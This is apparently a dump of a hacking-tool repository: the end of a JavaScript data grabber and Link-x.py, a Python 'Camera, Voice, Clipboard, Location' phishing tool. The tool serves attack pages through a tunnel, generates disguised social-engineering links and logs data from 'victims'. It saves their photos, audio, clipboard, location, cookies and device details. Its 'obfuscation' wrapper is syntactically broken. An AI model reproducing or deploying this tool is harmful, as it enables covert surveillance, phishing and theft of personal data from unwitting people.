170 | const query = `?ip=${encodeURIComponent(ip)}&time=${encodeURIComponent(time)}&touch=${encodeURIComponent(touch)}&cookie=${cookie}&ua=${encodeURIComponent(ua)}&platf=${encodeURIComponent(platf)}&lang=${encodeURIComponent(lang)}&memory=${encodeURIComponent(memory)}&wid=${wid}&hig=${hig}&netType=${encodeURIComponent(netType)}&saveData=${saveData}&batLevel=${encodeURIComponent(battery.level)}&batCharge=${battery.charging}&dname=${encodeURIComponent(dname)}`;
171 |
172 | send("./get_data.php" + query);
173 | window.location.href = REDIRECT_URL;
174 |
175 | } catch (e) {
176 | console.error("Error in details.js:", e);
177 | window.location.href = REDIRECT_URL;
178 | }
179 | }
180 |
181 | // Jalankan pengumpulan
182 | fetchData();
--------------------------------------------------------------------------------
/Link-x.py:
--------------------------------------------------------------------------------
1 | # Obfuscated by Mr.X
2 | import base64
3 | exec(base64.b64decode('"""
About Tool:
    Name : Link-X
    Description : Camera, Voice, Clipboard (etc...) Grabber
    Author : Mr.X
    GitHub : https://github.com/Whomrx666  
    Version : 2.0

More Description:
    This Tool can Hack and Grab data of Camera, Voice, Clipboard, Location.
    It can Grab As much info as Possible from Victims Device.
    All this requires Just a Malicious Link

Tunnel Options:
    localhost.run (via SSH)

Note:
    This Tool is only for Educational Purpose
    Mr.X will not be responsible for any Misuse
"""

import os
import time
import sys
import json
import shutil
import subprocess as sb
import re

# Global Variables
attackMethod = ""
maskUrl = ""
host = "127.0.0.1"
chroot = False if (sb.getoutput("command -v termux-chroot") == "") else True
tunnel_active = True

columns = shutil.get_terminal_size().columns

# Cyberpunk Neon Colors
NEON_PURPLE = "\033[38;5;93m"
NEON_BLUE = "\033[38;5;81m"
NEON_WHITE = "\033[38;5;15m"
RESET = "\033[0m"

def cPrint(text, Return=False):
    text = text.replace("cPurple", NEON_PURPLE).replace("cBlue", NEON_BLUE).replace("cWhite", NEON_WHITE)
    output = text + RESET
    if Return:
        return output
    print(output)

def psb(z, end="\n"):
    z = cPrint(z, True)
    for p in z + end:
        sys.stdout.write(p)
        sys.stdout.flush()
        time.sleep(0.01)

def logo():
    os.system("clear")
    banner = f"""
{NEON_PURPLE} ██╗     ██╗███╗   ██╗██╗  ██╗    ██╗  ██╗
{NEON_PURPLE} ██║     ██║████╗  ██║╚██╗██╔╝    ╚██╗██╔╝
{NEON_BLUE} ██║     ██║██╔██╗ ██║ ╚███╔╝      ╚███╔╝ 
{NEON_BLUE} ██║     ██║██║╚██╗██║ ██╔██╗      ██╔██╗ 
{NEON_PURPLE} ███████╗██║██║ ╚████║██╔╝ ██╗    ██╔╝ ██╗
{NEON_PURPLE} ╚══════╝╚═╝╚═╝  ╚═══╝╚═╝  ╚═╝    ╚═╝  ╚═╝
{RESET}"""
    for line in banner.strip().splitlines():
        print(line.center(columns))

    sep_len = min(columns - 10, 50)
    separator = NEON_PURPLE + "─" * sep_len + RESET
    print(separator.center(columns))

    info_lines = [
        f"{NEON_BLUE}             Author {NEON_WHITE}: {NEON_WHITE}Mr.X",
        f"{NEON_BLUE}             Tool {NEON_WHITE}: {NEON_WHITE}Link-X (Hack With Link)",
        f"{NEON_BLUE}           GitHub {NEON_WHITE}: {NEON_WHITE}https://github.com/Whomrx666  ",
        f"{NEON_BLUE}                    Coder {NEON_WHITE}: {NEON_WHITE}Whomrx {NEON_PURPLE}v2.0"
    ]
    for line in info_lines:
        print(line.center(columns))

    print(separator.center(columns))

def killAll():
    pids = sb.getoutput("pidof php ssh").split()
    for pid in pids:
        if pid.isdigit():
            os.system(f"kill {pid} > /dev/null 2>&1")
    os.system("pkill -f localhost.run > /dev/null 2>&1")
    os.system("pkill -f php > /dev/null 2>&1")

def update():
    psb("\n    cWhite[cPurple!cWhite] Please wait, Checking Update...")
    try:
        oldVersion = json.loads(open(".version", "r").read())["version"]
    except:
        oldVersion = "1.0"
    
    try:
        newVersion = json.loads(sb.getoutput("curl -s \"https://raw.githubusercontent.com/Whomrx666/Link-x/main/.version  \"").replace("\n", "").strip())["version"]
    except:
        cPrint("\n    cWhite[cPurple!cWhite] Something Went Wrong!")
        sys.exit("")
    
    if oldVersion != newVersion:
        psb("\n    cWhite[cPurple!cWhite] Tool Update Found!")
        cPrint("    [!] Updating Tool...")
        os.system("cd ../ && rm -rf Link-x && git clone https://github.com/Whomrx666/Link-x   > /dev/null 2>&1")
        psb("\n    [cPurple*cWhite] Update Complete!")
        psb("    [cPurple*cWhite] Starting new Version...")
        os.system("cd ../Link-x && python Link-x.py")
    else:
        psb("\n    cWhite[cPurple*cWhite] Tool is already Up to Date!")
        time.sleep(0.8)
        input(cPrint("\n    [cPurple*cWhite] Press Enter to Continue...", True))

def printLocation(tmp):
    data = json.loads(tmp)["info"]
    time.sleep(0.4)
    cPrint(f"\n    [cPurple~cWhite] LatitudecPurple: cWhite{data['lat']}")
    cPrint(f"\n    [cPurple~cWhite] LongitudecPurple: cWhite{data['lon']}")
    cPrint(f"\n    [cPurple~cWhite] AccuracycPurple: cWhite{data['acc']}")
    cPrint(f"\n    [cPurple~cWhite] AltitudecPurple: cWhite{data['alt']}")
    lat = data['lat']
    lon = data['lon']
    cPrint(f"\n    [cPurple~cWhite] Google MapcPurple: cWhitehttps://www.google.com/maps/search/?api=1&query=  {lat},{lon}")
    cPrint("\n    [cPurple*cWhite] Waiting for next Victim...")

def printDetails(tmp):
    data = json.loads(tmp)["info"]
    cPrint("\n    [cPurple*cWhite] Parsing Data...")
    ip = data.get("ip", "unknown").replace("\n", "").replace(" ", "")
    
    ipDetails = sb.getoutput(f"curl -s 'http://ip-api.com/json/{ip}'")
    
    country = "None"
    city = "None"
    callCode = "None"
    timeZone = "None"
    ISP = "None"
    
    if not ("error" in ipDetails) and ipDetails.strip() != "":
        try:
            ipDetails = json.loads(ipDetails)
            if isinstance(ipDetails, dict) and ipDetails.get("status") == "success":
                country = ipDetails.get("country", "None")
                city = ipDetails.get("city", "None")
                callCode = ipDetails.get("countryCode", "None")
                timeZone = ipDetails.get("timezone", "None")
                ISP = ipDetails.get("isp", "None")
        except:
            pass
    
    cPrint(f"\n    [cPurple*cWhite] IP Address: {data.get('ip', 'unknown')}")
    print("")
    cPrint("[cPurple*cWhite] Basic Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Time in Victim’s DevicecPurple: cWhite{data.get('time', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Device NamecPurple: cWhite{data.get('dname', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] CookiecPurple: cWhite{data.get('cookie', 'N/A').title()}")
    cPrint(f"    [cPurple~cWhite] User AgentcPurple: cWhite{data.get('ua', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] PlatformcPurple: cWhite{data.get('platf', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] LanguagecPurple: cWhite{data.get('lang', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Device MemorycPurple: cWhite{data.get('memory', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click XcPurple: cWhite{data.get('clickX', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click YcPurple: cWhite{data.get('clickY', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Click TimecPurple: cWhite{data.get('clickTime', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Screen Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Max Touch PointscPurple: cWhite{data.get('touch', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Screen WidthcPurple: cWhite{data.get('wid', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] Screen HeightcPurple: cWhite{data.get('hig', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Network Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Data TypecPurple: cWhite{data.get('netType', 'N/A').title()}")
    cPrint(f"    [cPurple~cWhite] ISPcPurple: cWhite{str(ISP)}")
    print("")
    cPrint("[cPurple*cWhite] Battery Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] Battery LevelcPurple: cWhite{data.get('batLevel', 'N/A')}")
    cPrint(f"    [cPurple~cWhite] ChargingcPurple: cWhite{data.get('batCharge', 'N/A')}")
    print("")
    cPrint("[cPurple*cWhite] Country Info".center(columns))
    print("")
    cPrint(f"    [cPurple~cWhite] CountrycPurple: cWhite{str(country)}")
    cPrint(f"    [cPurple~cWhite] CitycPurple: cWhite{str(city)}")
    cPrint(f"    [cPurple~cWhite] Calling CodecPurple: cWhite{str(callCode)}")
    cPrint(f"    [cPurple~cWhite] Time ZonecPurple: cWhite{str(timeZone)}")
    cPrint("\n    [cPurple*cWhite] Waiting for next Victim...")

def setupFiles(redirectUrl, toCopy=None, show=None):
    if not os.path.exists(".server"):
        os.system("mkdir .server > /dev/null 2>&1")
    os.system("rm -rf ./.server/* > /dev/null 2>&1")

    if attackMethod != "clickjacking":
        if not redirectUrl or redirectUrl.strip() == "":
            redirectUrl = "https://you.regettingold.com/  "
        else:
            redirectUrl = redirectUrl.strip()
            if not redirectUrl.startswith(("http://", "https://")):
                redirectUrl = "https://" + redirectUrl
            redirectUrl = redirectUrl.rstrip('/') + '/'

        os.system("cp -r ./.site/index/* ./.server/")
        os.system("cp -r ./.site/js/" + attackMethod + ".js ./.server/index.js")
        os.system("cp -r ./.site/php/" + attackMethod + ".php ./.server/get_data.php")

        try:
            with open("./.server/index.js", "r", encoding="utf-8") as f:
                jsData = f.read()
            jsData = re.sub(
                r"https?://you\.regettingold\.com/?",
                redirectUrl,
                jsData,
                flags=re.IGNORECASE
            )
            with open("./.server/index.js", "w", encoding="utf-8") as f:
                f.write(jsData)
        except Exception as e:
            cPrint(f"\n    [cPurple!cWhite] Warning: Failed to update redirect URL in index.js: {str(e)}")

        if attackMethod == "voice":
            try:
                with open("./.server/index.js", "r", encoding="utf-8") as f:
                    jsData = f.read()
                jsData = re.sub(
                    r'redirectUrl\s*=\s*["\'][^"\']*["\']',
                    f'redirectUrl = "{redirectUrl}"',
                    jsData
                )
                with open("./.server/index.js", "w", encoding="utf-8") as f:
                    f.write(jsData)
            except Exception as e:
                cPrint(f"\n    [cPurple!cWhite] Warning: Failed to update redirect URL in voice.js: {str(e)}")

    else:
        os.system("cp -r ./.site/clickjacking/* ./.server/")
        os.system("rm -f ./.server/index.php")

# ✅ UPDATED: createMaskPage — now works for camera too
def createMaskPage(maskName, mainUrl):
    maskDir = "./.server/mask"
    os.makedirs(maskDir, exist_ok=True)
    maskFile = os.path.join(maskDir, f"{maskName}.html")

    # Escape quotes for JS
    safeUrl = mainUrl.replace('"', '\\"')
    
    htmlContent = f"""<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Loading...</title>
    <meta http-equiv="refresh" content="0;url={mainUrl}">
    <script>
        window.location.replace("{safeUrl}");
    </script>
</head>
<body>
</body>
</html>"""

    try:
        with open(maskFile, "w", encoding="utf-8") as f:
            f.write(htmlContent)
        base = mainUrl.rstrip('/')
        return f"{base}/mask/{maskName}.html"
    except Exception as e:
        cPrint(f"\n    [cPurple!cWhite] Failed to create mask page: {str(e)}")
        return None

def startPHP():
    port = "8080"
    os.system(f"cd ./.server && php -S {host}:{port} > /dev/null 2>&1 &")
    return port

def startLocalhostRun(port, maskUrl=None):
    global tunnel_active
    cPrint("\n    [cPurple*cWhite] Launching localhost.run tunnel...")
    os.system("rm -f .lhr.log > /dev/null 2>&1")
    
    ssh_cmd = (
        f"ssh -o StrictHostKeyChecking=no "
        f"-o ServerAliveInterval=30 "
        f"-o ServerAliveCountMax=3 "
        f"-R 80:localhost:{port} "
        f"nokey@localhost.run > .lhr.log 2>&1 &"
    )
    
    if chroot:
        os.system(f"termux-chroot {ssh_cmd}")
    else:
        os.system(ssh_cmd)
    
    time.sleep(4)
    mainUrl = ""
    for _ in range(40):
        if os.path.exists(".lhr.log"):
            try:
                with open(".lhr.log", "r") as f:
                    content = f.read()
                    if "https://" in content:
                        for line in content.splitlines():
                            if "https://" in line and ".lhr.life" in line:
                                mainUrl = line.split()[0]
                                break
                        if mainUrl:
                            break
            except:
                pass
        time.sleep(1)
    
    if not mainUrl:
        cPrint("\n    [cPurple!cWhite] Failed to start localhost.run tunnel!")
        cPrint("    [cPurple!cWhite] Check internet or try again.\n")
        tunnel_active = False
        return "", "", ""
    
    mainUrl = mainUrl.strip()
    if not mainUrl.startswith("https://"):
        mainUrl = "https://" + mainUrl

    return mainUrl, "", ""

def getIp():
    path = ".server/ip.txt"
    if os.path.exists(path):
        with open(path, "r") as f:
            ip_data = [line.strip() for line in f if line.strip()]
        if ip_data:
            cPrint("\n    cBlue[cPurple+cBlue] cWhiteVictim Opened The Link!!")
            cPrint(f"\n    [cPurple~cWhite] Victim IPcPurple: cWhite{ip_data[0]}")
            cPrint("\n    [cPurple~cWhite] Saved IncPurple: cWhiteip.txt")
            os.system("cat " + path + " >> ip.txt")
            os.system("rm " + path)

def getLog():
    attDesDict = {
        "camera": {"ext": ".png", "head": "cam_", "file": "Image File"},
        "voice": {"ext": ".wav", "head": "audio_", "file": "Voice File"},
        "clipboard": {"ext": ".dat", "head": "cb_", "file": "Clipboard Data"},
        "location": {"ext": ".json", "head": "loc_", "file": "Location Data"},
        "details": {"ext": ".json", "head": "details_", "file": "Device Details"},
        "clickjacking": {"ext": ".json", "head": "click_", "file": "Click Data"}
    }
    if attackMethod not in attDesDict:
        return

    attack = attDesDict[attackMethod]
    ext = attack["ext"]
    head = attack["head"]
    fileType = attack["file"]
    body = str(time.time())[:10]

    logPath = "./.server/Log.log"
    if not os.path.exists(logPath):
        return
    if not (open(logPath, "r").read().strip() == "Received"):
        return

    os.remove(logPath)
    cPrint(f"\n    cPurple[cWhite+cPurple] cWhite{fileType} Received!")

    if attackMethod == "clipboard":
        clipData = open(".server/data.dat", "r").read()
        cPrint(f"\n[cPurpleDatacWhite]cPurple: cWhite{clipData}")
    elif attackMethod == "location":
        locData = open(".server/data.json", "r").read()
        printLocation(locData)
    elif attackMethod in ["details", "clickjacking"]:
        wait_count = 0
        while not os.path.exists(".server/data.json") and wait_count < 10:
            time.sleep(0.3)
            wait_count += 1
        if os.path.exists(".server/data.json"):
            with open(".server/data.json", "r") as f:
                deviceData = f.read()
            printDetails(deviceData)

    os.system(f"mv ./.server/*{ext} /sdcard/HackedData/{head}{body}{ext} 2>/dev/null")

def startProcess():
    global maskUrl, tunnel_active
    maskUrl = ""
    redirectUrl = ""

    cPrint("\n" + ("─" * 40).center(columns))
    
    mask_choice = input(cPrint("\n    cWhite[cPurple*cWhite] Want to generate a Masked URL for social engineering? [cPurpley/ncWhite]:> ", True)).strip().lower()
    if mask_choice == "y":
        while True:
            mask_input = input(cPrint("\n    [cPurple*cWhite] Enter Mask Name (e.g. free-iphone):> cWhite", True)).strip()
            if mask_input:
                maskUrl = mask_input
                break
            else:
                cPrint("    [cPurple!cWhite] Mask name cannot be empty.")

    if attackMethod == "clickjacking":
        cPrint("\n    cWhite[cPurple*cWhite] ClickJacking Mode Activated")
        cPrint("    cWhite[cPurple*cWhite] Redirect After Click: https://www.apple.com/  ")
        redirectUrl = "https://www.apple.com/  "
    else:
        cPrint("\n    cWhite[cPurple*cWhite] Enter a Website URL to Redirect Victim After Exploit")
        cPrint("    cWhite(cPurpleLeave empty for default: YouAreGettingOldcWhite)")
        redirectUrl = input(cPrint("    cPurple[URL]cWhite:> ", True)).strip()

    cPrint("\n" + ("─" * 40).center(columns))
    cPrint("    [cPurple!cWhite] Setting up Files...".center(columns))
    setupFiles(redirectUrl)

    time.sleep(1)
    cPrint("\n    [cPurple!cWhite] Starting PHP Server...")
    port = startPHP()
    time.sleep(2)

    mainUrl, _, _ = startLocalhostRun(port, None)

    if not mainUrl:
        cPrint("\n    [cPurple!cWhite] Cannot proceed without tunnel. Exiting.")
        sys.exit(1)

    # ✅ UPDATED: Now camera uses mask page like voice
    maskedDisplayUrl = None
    if maskUrl:
        if attackMethod in ["camera", "voice", "clickjacking"]:
            maskedDisplayUrl = createMaskPage(maskUrl, mainUrl)
        else:
            cleanMask = maskUrl.replace(" ", "").replace("/", "").strip()
            if cleanMask:
                maskedDisplayUrl = f"https://{cleanMask}@{mainUrl.replace('https://', '')}"

    logo()
    cPrint(f"\ncWhite[cPurple*cWhite] Successfully Hosted atcPurple: cWhitehttp://{host}:{port}")
    
    cPrint(f"\n[cPurple~cWhite] URL 01 (Main URL)cPurple: cWhite{mainUrl}")

    if maskedDisplayUrl:
        if attackMethod in ["voice", "clickjacking"]:
            cPrint(f"\n[cPurple~cWhite] URL 02 (Mask Page)cPurple: cWhite{maskedDisplayUrl}")
            cPrint("\n    [cPurple!cWhite] 💡 This mask page redirects instantly to the real payload.")
            cPrint("    [cPurple!cWhite] ✅ Safe for Voice & ClickJacking!")
        else:
            # Now includes camera
            cPrint(f"\n[cPurple~cWhite] URL 02 (Mask Page)cPurple: cWhite{maskedDisplayUrl}")
            cPrint("\n    [cPurple!cWhite] ⚡ Masked URL ready. Works for Camera, Voice, and more.")

    cPrint("\n[cPurple*cWhite] Data Saved In cPurple: cWhite/sdcard/HackedData")
    cPrint("\n[cPurple*cWhite] Waiting for Victim, Press cPurpleCtrl cWhite+ cPurpleC cWhiteto Stop...\n")

    try:
        while True:
            tunnel_check = sb.getoutput("ps aux | grep 'localhost.run' | grep -v grep | grep -v python")
            if not tunnel_check.strip() and tunnel_active:
                cPrint("\n    [cPurple!cWhite] Tunnel down! Restarting...")
                mainUrl, _, _ = startLocalhostRun(port, None)
                if mainUrl:
                    if maskUrl and attackMethod in ["camera", "voice", "clickjacking"]:
                        maskedDisplayUrl = createMaskPage(maskUrl, mainUrl)
                    logo()
                    cPrint(f"\n[cPurple~cWhite] New URL:cPurple {mainUrl}")
                    if maskedDisplayUrl:
                        cPrint(f"[cPurple~cWhite] Mask URL:cPurple {maskedDisplayUrl}")
                else:
                    cPrint("\n    [cPurple!cWhite] Failed to restart tunnel.")
                    break

            getIp()
            getLog()
            time.sleep(2)
    except KeyboardInterrupt:
        tunnel_active = False
        cPrint("\n    [cPurple!cWhite] Process Stopped By User\n")
        killAll()
        sys.exit()

def menu():
    logo()
    psb("\n    cWhite[cPurple*cWhite] Choose Your Option: \n")
    cPrint("    [cPurple01cWhite] Camera Hack")
    cPrint("    [cPurple02cWhite] Voice Hack")
    cPrint("    [cPurple03cWhite] Clipboard Hack")
    cPrint("    [cPurple04cWhite] Location Hack")
    cPrint("    [cPurple05cWhite] ClickJacking")
    cPrint("    [cPurple06cWhite] Get Victim Device Details")
    cPrint("    [cPurple08cWhite] Update Tool")
    cPrint("    [cPurple00cWhite] Exit")

    op = input(cPrint("\n    [cPurple*cWhite] Enter Your Choice:> cPurple", True)).strip()
    if op in ["0", "00"]:
        cPrint("\n    [cPurple!cWhite] Exiting Link-X...\n")
        killAll()
        sys.exit(0)
    while op not in ["1", "2", "3", "4", "5", "6", "8"]:
        psb("\n    cWhite[cPurple!cWhite] Wrong Choice!")
        op = input(cPrint("\n    [cPurple*cWhite] Enter Your Choice:> cPurple", True)).strip()
        if op in ["0", "00"]:
            cPrint("\n    [cPurple!cWhite] Exiting Link-X...\n")
            killAll()
            sys.exit(0)

    if op == "8":
        update()

    attList = ["camera", "voice", "clipboard", "location", "clickjacking", "details"]
    global attackMethod
    attackMethod = attList[int(op) - 1]
    startProcess()

if __name__ == "__main__":
    required = ["php", "curl", "wget", "unzip", "ssh"]
    if any(sb.getoutput(f"command -v {pkg}") == "" for pkg in required):
        os.system("python setup.py")

    if not os.path.exists("/sdcard/HackedData"):
        os.makedirs("/sdcard/HackedData", exist_ok=True)
    killAll()
    menu()').decode('utf-8'))
4 |
--------------------------------------------------------------------------------